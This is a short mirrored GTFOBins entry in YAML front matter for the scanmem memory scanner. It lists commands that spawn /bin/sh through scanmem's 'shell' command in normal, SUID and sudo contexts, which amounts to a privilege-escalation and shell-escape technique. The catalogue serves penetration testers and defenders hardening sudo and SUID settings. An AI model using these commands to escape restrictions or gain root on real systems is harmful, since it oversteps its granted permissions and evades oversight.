mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
f4e32136aa
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
16 lines
207 B
Markdown
16 lines
207 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
scanmem
|
|
shell /bin/sh
|
|
suid:
|
|
- code: |
|
|
./scanmem
|
|
shell /bin/sh
|
|
sudo:
|
|
- code: |
|
|
sudo scanmem
|
|
shell /bin/sh
|
|
---
|